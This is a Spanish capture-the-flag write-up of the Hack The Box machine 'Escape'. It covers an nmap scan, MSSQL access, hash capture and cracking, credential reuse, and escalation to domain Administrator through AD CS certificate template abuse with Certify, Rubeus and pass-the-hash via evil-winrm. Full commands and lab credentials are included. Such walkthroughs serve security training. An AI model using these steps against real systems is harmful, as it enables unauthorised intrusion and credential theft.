M4nu
  • whoami
  • 🏆 Certificaciones
    • eJPTv2
    • eCPPTv3
    • KLCP
  • CWP
  • 🏗️Mis Proyectos
    • Apache Hunter
    • Águila
      • Águila-Https
        • Configuración Proxy Automático
        • Configuración Proxy Manual
      • Águila-Http
      • Águila-Infection
    • PingMapper
    • WizardScan
    • FakeHosts
    • EvasionIDS
    • nmap2ports
  • 📝 Write Ups
    • Hack The Box
      • Windows
        • Granny
        • Escape
        • Bastard
      • Linux
        • Keeper
        • BoardLight
        • Backdoor
      • Active Directory
        • Sauna
        • Monteverde
        • ServMon
    • Proving Grounds Practice
      • Linux
        • Twiggy
      • Windows
        • Algernon
        • Craft
  • 📚Apuntes
    • Nmap
      • Esencial ⭐
      • Reconocimiento de Hosts
      • Scripts
      • Evasión de Firewalls y IDS/IPS
      • IPv6
    • Best of Nuclei
      • Plantillas para Wordpress
    • Tor en línea de comandos
Con tecnología de GitBook
En esta página
  • Reconocimiento
  • Explotación
  • Escalada de Privilegios
  1. 📝 Write Ups
  2. Hack The Box
  3. Windows

Escape

AnteriorGrannySiguienteBastard

Última actualización hace 7 meses

Reconocimiento

# Nmap 7.94SVN scan initiated Sat Oct  5 11:23:59 2024 as: nmap -p135,139,1433,3268,3269,389,445,464,49667,49689,49690,49711,49730,49749,53,593,5985,636,88,9389 -sCV -T5 -oN Taregetd 10.10.11.202
Nmap scan report for 10.10.11.202
Host is up (0.053s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-05 23:24:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
|_ssl-date: 2024-10-05T23:25:35+00:00; +7h59m59s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
|_ssl-date: 2024-10-05T23:25:35+00:00; +7h59m59s from scanner time.
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.11.202:1433: 
|     Target_Name: sequel
|     NetBIOS_Domain_Name: sequel
|     NetBIOS_Computer_Name: DC
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: dc.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ms-sql-info: 
|   10.10.11.202:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_ssl-date: 2024-10-05T23:25:35+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-10-05T23:05:54
|_Not valid after:  2054-10-05T23:05:54
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-05T23:25:35+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-05T23:25:35+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after:  2074-01-05T23:03:57
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         Microsoft Windows RPC
49711/tcp open  msrpc         Microsoft Windows RPC
49730/tcp open  msrpc         Microsoft Windows RPC
49749/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-10-05T23:24:57
|_  start_date: N/A
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Explotación

Empezando enumerando el puerto 445 smb he encontrado un pdf

Dentro del pdf encontramos unas credenciales con las cuales podemos entrar en el puerto 1433 donde corre Microsoft SQL Server 2019

Vamos a utilizar estas credenciales para entrar en la base de datos de la siguiente manera:

impacket-mssqlclient PublicUser:GuestUserCantWrite1@sequel.htb

Una vez dentro de la máquina abrimos o un responder con el comando sudo responder -I tun0

o abriendo un smbserver con el comando impacket-smbserver folder . -smb2support

Una vez con este hash lo pasamos por John y encontramos la contraseña para el usuario sql_svc

Con estas credenciales vamos a entrar por evil-winrm a la máquina

evil-winrm -i 10.10.11.202 -u 'sql_svc' -p "REGGIE1234ronnie"

Una vez dentor de la máquina nos dirigimos a la ruta

C:\SQLServer\Logs

y aquí con el comando type vamos a leer el archivo ERRORLOG.BAK donde vamos a encontrar las credenciales

una vez con estas credenciales entramos por win-rm y vamos con la escalada de privilegios

evil-winrm -i 10.10.11.202 -u 'Ryan.Cooper' -p "NuclearMosquito3"

Escalada de Privilegios

Para la escalada de privilegios vamos a utilizar una técnica llamada Certify.exe

Para ello lo primero que tenemos que hacer es descargarnos tanto certify.exe como Rubeus.exe y pasarlo a la máquina víctima

Una vez con los dos .exe dentro de la máquina víctima vamos a comprobar primero si es vulnerable a esta técnica con el comando

Certify.exe find /vulnerable

y encontramos las siguientes templates vulnerable:

ahora ejecutqamos el siguiente comando con el template vulnerable que nos ha salido:

./Certify.exe request /ca:sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator

esto nos va a crear un par de claves las cuales vamos a copiar y vamos a pegar en un archivo en nuestra maquina el cual vamos a llamar cert.pem, una vez con este archivo creado, ejecutamos el siguiente comando:

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

El certificado que nos crea este comando vamos a subirla a la máquina víctima y vamso a aejecutar el sigueinte comando:

.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials

este comandonos dara el hash NTLM de el usuario administrator

con el cual vamos a poder entrar en el usuario administrator con elvi-winrm y obtener el root.txt

evil-winrm -i 10.10.11.202 -u 'administrator' -H "A52F78E4C751E5F5E17E1E9F3E58F4EE"
https://app.hackthebox.com/machines/531
GitHub - r3motecontrol/Ghostpack-CompiledBinaries: Compiled Binaries for Ghostpack (.NET v4.0)GitHub
GitHub - GhostPack/Certify: Active Directory certificate abuse.GitHub
Logo
Logo